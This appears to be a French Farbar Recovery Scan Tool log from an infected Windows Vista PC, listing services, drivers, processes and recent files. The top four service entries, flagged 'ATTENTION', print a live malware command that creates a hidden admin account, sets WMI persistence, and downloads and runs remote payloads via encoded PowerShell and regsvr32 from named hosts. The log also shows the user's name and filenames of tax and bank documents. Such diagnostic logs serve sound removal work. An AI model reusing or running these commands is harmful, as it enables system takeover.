S2 BGVJ; cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", Consumer="CommandLineEventConsumer.Name="fuckyoumm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll [X] <==== ATTENTION
S2 PBAD; cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", Consumer="CommandLineEventConsumer.Name="fuckyoumm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll [X] <==== ATTENTION
S2 ZuiC; cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", Consumer="CommandLineEventConsumer.Name="fuckyoumm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll [X] <==== ATTENTION
S2 ZWjH; cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", Consumer="CommandLineEventConsumer.Name="fuckyoumm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll [X] <==== ATTENTION
===================== Pilotes (Avec liste blanche) ======================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [167480 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriverx.sys [188976 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidshx.sys [165384 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswblog; C:\Windows\System32\drivers\aswblogx.sys [284256 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbunivx.sys [57904 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
S3 aswHwid; C:\Windows\System32\drivers\aswHwid.sys [42736 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [40688 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [135200 2019-01-19] (AVAST Software s.r.o. -> AVAST Software)
R0 aswNdis; C:\Windows\System32\DRIVERS\aswNdis.sys [12112 2019-02-26] (ALWIL Software -> ALWIL Software)
R0 aswNdis2; C:\Windows\System32\drivers\aswNdis2.sys [332280 2019-02-26] (AVAST Software s.r.o. -> AVAST Software)
R1 AswRdr; C:\Windows\System32\drivers\aswRdr.sys [70640 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [72800 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [784560 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [398200 2019-04-29] (AVAST Software s.r.o. -> AVAST Software)
R3 aswStmXP; C:\Windows\System32\drivers\aswStmXP.sys [146584 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [310200 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
S3 atikmdag; C:\Windows\System32\DRIVERS\atikmdag.sys [3533824 2008-03-09] (Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.)
R0 AtiPcie; C:\Windows\System32\DRIVERS\AtiPcie.sys [7680 2006-10-30] (Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.)
S3 DrvAgent32; C:\Windows\system32\Drivers\DrvAgent32.sys [30504 2017-01-13] (eSupport.com, Inc -> Phoenix Technologies)
S4 iteatapi; C:\Windows\system32\drivers\iteatapi.sys [35944 2006-11-02] (Microsoft Windows -> Integrated Technology Express, Inc.)
S4 iteraid; C:\Windows\system32\drivers\iteraid.sys [35944 2006-11-02] (Microsoft Windows -> Integrated Technology Express, Inc.)
S3 LVUSBSta; C:\Windows\System32\drivers\lvusbsta.sys [22016 2005-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
R2 npf; C:\Windows\System32\drivers\npf.sys [35088 2011-02-11] (CACE Technologies, Inc. -> CACE Technologies, Inc.)
S4 ntrigdigi; C:\Windows\system32\drivers\ntrigdigi.sys [20608 2006-11-02] (Microsoft Windows -> N-trig Innovative Technologies)
S3 PID_0928; C:\Windows\System32\DRIVERS\LV561AV.SYS [211712 2005-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S1 RapportAegle; C:\Program Files\Trusteer\Rapport\bin\RapportAegle.sys [296880 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S1 RapportCerberus_1908115; C:\ProgramData\Trusteer\Rapport\store\exts\RapportCerberus\baseline\RapportCerberus32_1908115.sys [1123304 2018-03-27] (IBM -> IBM Corp.) [Fichier non signé]
S1 RapportEI; C:\Program Files\Trusteer\Rapport\bin\RapportEI.sys [395624 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S3 RapportHades; C:\Windows\System32\Drivers\RapportHades.sys [200936 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S3 RapportIaso; c:\programdata\trusteer\rapport\store\exts\rapportms\baseline\rapportiaso.sys [299112 2018-03-27] (IBM -> IBM Corp.) [Fichier non signé]
S3 RapportKELL; C:\Windows\System32\Drivers\RapportKELL.sys [321256 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S3 RapportPG; C:\Program Files\Trusteer\Rapport\bin\RapportPG.sys [466728 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [22728 2019-05-17] (AVG Technologies CZ, s.r.o. -> SlimWare Utilities, Inc.)
S4 uliahci; C:\Windows\system32\drivers\uliahci.sys [238648 2008-01-21] (Microsoft Windows -> ULi Electronics Inc.)
S4 UlSata; C:\Windows\system32\drivers\ulsata.sys [98408 2006-11-02] (Microsoft Windows -> Promise Technology, Inc.)
S4 ulsata2; C:\Windows\system32\drivers\ulsata2.sys [115816 2008-01-21] (Microsoft Windows -> Promise Technology, Inc.)
R3 yukonwlh; C:\Windows\System32\DRIVERS\yk60x86.sys [298496 2007-12-28] (Microsoft Windows Hardware Compatibility Publisher -> Marvell)
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
==================== NetSvcs (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
==================== Un mois (créés) ========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2019-05-17 15:29 - 2019-05-17 15:31 - 000040272 _____ C:\Users\françoise\Desktop\FRST.txt
2019-05-17 15:28 - 2019-05-17 15:29 - 000000000 ___DC C:\FRST
2019-05-17 15:26 - 2019-05-17 15:26 - 001793536 _____ (Farbar) C:\Users\françoise\Desktop\Non confirmé 306702.crdownload
2019-05-17 15:17 - 2019-05-17 15:28 - 001793536 _____ (Farbar) C:\Users\françoise\Desktop\FRST.exe
2019-05-17 15:07 - 2019-05-17 15:07 - 000069579 _____ C:\Users\françoise\Desktop\2019-05-17windows.pdf
2019-05-15 10:32 - 2019-05-15 10:32 - 000335224 _____ C:\Windows\system32\FNTCACHE.DAT
2019-05-15 09:03 - 2019-05-15 09:03 - 001852840 _____ (Orange) C:\Users\françoise\Documents\Orange-assistant-page-de-demarrage.exe
2019-05-13 07:45 - 2019-05-13 07:45 - 000000970 _____ C:\Users\Public\Desktop\Avast Cleanup Premium.lnk
2019-05-11 11:55 - 2019-05-11 11:55 - 000108649 _____ C:\Users\françoise\impot 2018 pour 2019.pdf
2019-05-11 11:23 - 2019-05-11 11:23 - 001852840 _____ (Orange) C:\Users\françoise\Orange-assistant-page-de-demarrage.exe
2019-05-11 09:59 - 2019-05-11 09:59 - 127391104 ____C (Microsoft Corporation) C:\Windows\system32\MRT-KB890830.exe
2019-05-06 08:48 - 2019-05-06 08:48 - 000049590 _____ C:\Users\françoise\Desktop\2019-05-06_084806 trojan.pdf
2019-05-05 09:55 - 2008-04-01 06:00 - 000055296 _____ (CANON INC.) C:\Users\françoise\cnmss Canon MP240 series Printer (Local).dll
2019-05-04 10:32 - 2019-05-04 10:32 - 000077121 _____ C:\Users\françoise\Desktop\facture_9046121647_2019-04-23.pdf
2019-05-04 06:47 - 2019-05-04 06:47 - 000000000 ____D C:\Users\françoise\AppData\Local\BitTorrentHelper
2019-05-02 14:21 - 2019-03-26 09:07 - 000013104 _____ C:\Users\françoise\Documents\ReleveMensuelJanvier2019.pdf
2019-05-02 14:02 - 2019-05-02 14:02 - 000000000 ____D C:\Users\françoise\AppData\Roaming\Lavasoft
2019-05-02 14:02 - 2019-05-02 14:02 - 000000000 ____D C:\Users\françoise\AppData\Local\Lavasoft
2019-05-02 14:00 - 2019-05-15 11:00 - 000000000 ____D C:\Users\françoise\AppData\Roaming\uTorrent
2019-05-02 05:36 - 2019-05-17 14:36 - 000000080 _____ C:\Windows\system32\s
2019-05-02 05:36 - 2019-05-17 14:36 - 000000078 _____ C:\Windows\system32\ps
2019-05-02 05:36 - 2019-05-17 14:36 - 000000076 _____ C:\Windows\system32\p
2019-04-30 07:49 - 2019-04-30 07:51 - 000000000 ____D C:\Users\françoise\AppData\Roaming\fr.orange.assistancelivebox
2019-04-30 07:49 - 2019-04-30 07:49 - 000001030 _____ C:\Users\françoise\Desktop\ma Livebox.lnk
2019-04-30 07:49 - 2019-04-30 07:49 - 000000000 ____D C:\Users\françoise\AppData\Roaming\Microsoft\Windows\Start Menu\Programmes\Programs\Orange
2019-04-30 07:49 - 2019-04-30 07:49 - 000000000 ____D C:\Program Files\Bonjour
2019-04-30 07:48 - 2019-04-30 07:48 - 000000000 ____D C:\Program Files\WinPcap
2019-04-29 14:29 - 2019-05-02 12:54 - 000000000 ____D C:\Program Files\eMule
2019-04-28 17:36 - 2019-04-28 17:36 - 000000940 _____ C:\Users\françoise\Desktop\Attestation-Fiscale-PCI-2018 - Raccourci.lnk
2019-04-28 17:31 - 2019-04-28 17:31 - 000090439 _____ C:\Users\françoise\Avis_de_taxes_foncières_2018.pdf
2019-04-28 17:29 - 2019-04-28 17:29 - 000045749 _____ C:\Users\françoise\Desktop\Avis_de_taxe_d'habitation-CAP_2018.pdf
2019-04-28 17:11 - 2019-04-28 17:11 - 000122725 _____ C:\Users\françoise\Desktop\Réédition déclaration fiscale.pdf
2019-04-28 17:11 - 2019-04-28 17:11 - 000012768 _____ C:\Users\françoise\Desktop\Attestation-Fiscale-PCI-2018.pdf
==================== Un mois (modifiés) ========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2019-05-17 15:04 - 2006-11-02 14:47 - 000003216 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2019-05-17 15:04 - 2006-11-02 14:47 - 000003216 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2019-05-17 14:45 - 2006-11-02 13:18 - 000000000 ____D C:\Windows\inf
2019-05-17 14:43 - 2018-08-16 06:34 - 000000466 _____ C:\Windows\Tasks\Avast Driver Updater Startup.job
2019-05-17 14:43 - 2013-10-12 15:14 - 000000000 _____ C:\Windows\system32\LogConfigTemp.xml
2019-05-17 14:42 - 2006-11-02 13:18 - 000000000 ____D C:\Windows\system
2019-05-17 14:42 - 2006-11-02 13:18 - 000000000 ____D C:\Windows\IME
2019-05-17 14:41 - 2018-08-16 06:34 - 000022728 _____ (SlimWare Utilities, Inc.) C:\Windows\system32\Drivers\SWDUMon.sys
2019-05-17 14:37 - 2019-04-16 07:44 - 000023552 _____ (Microsoft Corporation) C:\Windows\system\downs.exe
2019-05-17 14:37 - 2019-04-16 07:44 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
2019-05-17 14:36 - 2006-11-02 15:01 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-05-17 10:47 - 2006-11-02 15:01 - 000032578 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2019-05-17 09:59 - 2014-03-03 14:36 - 000000000 ____D C:\Users\françoise\AppData\Local\CrashDumps
2019-05-17 09:57 - 2016-11-17 16:19 - 000000000 ____D C:\Users\françoise\AppData\LocalLow\Mozilla
2019-05-16 07:04 - 2016-06-23 17:03 - 000000000 ____D C:\Users\françoise\AppData\Local\AVAST Software
2019-05-15 07:26 - 2013-11-27 06:24 - 000842296 _____ (Adobe) C:\Windows\system32\FlashPlayerApp.exe
2019-05-15 07:26 - 2013-11-27 06:24 - 000175160 _____ (Adobe) C:\Windows\system32\FlashPlayerCPLApp.cpl
2019-05-15 07:26 - 2008-12-16 05:33 - 000000000 ____D C:\Windows\system32\Macromed
2019-05-13 08:06 - 2018-02-19 04:40 - 000000000 ____D C:\Users\françoise\Desktop\Anciennes données de Firefox
2019-05-13 08:06 - 2016-12-18 08:17 - 000000000 ____D C:\Users\françoise\AppData\Local\Microsoft Help
2019-05-13 08:06 - 2013-10-25 19:22 - 000000000 ____D C:\Users\françoise\AppData\Roaming\Skype
2019-05-13 08:06 - 2008-12-16 13:14 - 000000000 ____D C:\Windows\Panther
2019-05-13 07:47 - 2013-10-18 12:04 - 000000000 ____D C:\Users\françoise\AppData\Roaming\AVAST Software
2019-05-13 07:45 - 2019-02-26 18:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2019-05-13 07:44 - 2013-10-12 17:12 - 000000000 ____D C:\Program Files\AVAST Software
2019-05-13 07:44 - 2013-10-12 17:11 - 000000000 ____D C:\ProgramData\AVAST Software
2019-05-11 11:55 - 2013-10-12 13:18 - 000000000 ____D C:\Users\françoise
2019-05-11 10:05 - 2006-11-02 12:24 - 128044056 ____C (Microsoft Corporation) C:\Windows\system32\mrt.exe
2019-04-30 07:49 - 2014-01-04 15:40 - 000000000 ____D C:\ProgramData\Orange
2019-04-30 07:49 - 2014-01-04 15:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Orange
2019-04-30 07:48 - 2014-01-04 15:38 - 000000000 ____D C:\Program Files\Orange
2019-04-30 07:23 - 2008-01-21 10:41 - 001592042 _____ C:\Windows\system32\PerfStringBackup.INI
2019-04-30 07:23 - 2008-01-21 10:40 - 000722222 _____ C:\Windows\system32\perfh00C.dat
2019-04-30 07:23 - 2008-01-21 10:40 - 000146056 _____ C:\Windows\system32\perfc00C.dat
2019-04-30 07:18 - 2015-08-08 08:54 - 000000000 ____D C:\Windows\Minidump
2019-04-29 14:00 - 2013-10-12 17:14 - 000398200 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2019-04-28 17:16 - 2016-12-16 11:13 - 000000000 ____D C:\ProgramData\CanonIJPLM
==================== Fichiers à la racine de certains dossiers =======
2017-01-05 07:03 - 2017-01-05 07:03 - 001110564 _____ (Igor Pavlov) C:\Users\françoise\7z1604.exe
2016-12-17 19:47 - 2016-12-17 19:52 - 132368998 _____ () C:\Users\françoise\Apache_OpenOffice_4.1.3_Win_x86_install_fr.exe
2019-05-05 09:55 - 2008-04-01 06:00 - 000055296 _____ (CANON INC.) C:\Users\françoise\cnmss Canon MP240 series Printer (Local).dll
2019-02-04 12:39 - 2007-04-02 06:00 - 000055296 _____ (CANON INC.) C:\Users\françoise\cnmss Canon MP470 series Printer (Local).dll
2019-05-11 11:23 - 2019-05-11 11:23 - 001852840 _____ (Orange) C:\Users\françoise\Orange-assistant-page-de-demarrage.exe
2017-05-03 10:00 - 2017-05-03 10:00 - 002764800 _____ () C:\Users\françoise\ZHPCleaner.exe
2016-06-21 04:43 - 2016-07-22 19:54 - 002230272 _____ () C:\Users\françoise\ZHPDiag3.exe
2018-10-23 16:10 - 2018-10-23 16:10 - 007649280 _____ () C:\Program Files\GUT255C.tmp
2018-10-23 16:03 - 2018-10-23 16:03 - 007649280 _____ () C:\Program Files\GUTB931.tmp
2018-10-23 16:03 - 2018-10-23 16:03 - 007649280 _____ () C:\Program Files\GUTF103.tmp
2019-04-16 07:44 - 2019-05-17 14:37 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2014-03-15 04:09 - 2014-11-03 14:34 - 000000481 _____ () C:\Users\françoise\AppData\Roaming\mainhst.zgh
2013-10-12 17:28 - 2015-03-31 08:23 - 000026340 _____ () C:\Users\françoise\AppData\Roaming\UserTile.png
2014-09-25 18:59 - 2018-01-17 07:40 - 000000698 _____ () C:\Users\françoise\AppData\Roaming\wklnhst.dat
2013-11-12 12:46 - 2018-01-11 10:05 - 000008808 _____ () C:\Users\françoise\AppData\Local\d3d9caps.dat
2015-02-18 05:20 - 2015-02-18 05:20 - 000001974 _____ () C:\Users\françoise\AppData\Local\ZHPFixReport.txt
==================== SigCheck ===============================
(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)
LastRegBack: 2019-05-17 14:47
==================== Fin de FRST.txt ============================
Exécuté par françoise (administrateur) sur PC-DE-FRANÇOISE (Packard Bell BV IMEDIA A4730 FR) (17-05-2019 15:29:21)
Exécuté depuis C:\Users\françoise\Desktop
Profils chargés: françoise (Profils disponibles: françoise)
Platform: Microsoft® Windows Vista™ Édition Familiale Premium Service Pack 2 (X86) Langue: Français (France)
Internet Explorer Version 9 (Navigateur par défaut: "C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe" -- "%1")
Mode d'amorçage: Normal
Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processus (Avec liste blanche) =================
(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)
() [Fichier non signé] C:\Program Files\PACKARD BELL\Packard Bell Recovery Management\Service\ETService.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
(AVAST Software s.r.o. -> AVAST Software) [Fichier non signé] C:\Program Files\AVAST Software\Avast Cleanup\TuneupSvc.exe
(AVAST Software s.r.o. -> AVAST Software) [Fichier non signé] C:\Program Files\AVAST Software\Avast Cleanup\TuneupUI.exe
(Avast Software s.r.o. -> AVAST Software) C:\Program Files\Avast Driver Updater\Avast Driver Updater.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\afwServ.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\aswidsagent.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\wsc_proxy.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler.exe
(DEVGURU CO LTD -> DEVGURU Co., LTD.) C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe
(IBM -> IBM Corp.) [Fichier non signé] C:\Program Files\Trusteer\Rapport\bin\RapportMgmtService.exe
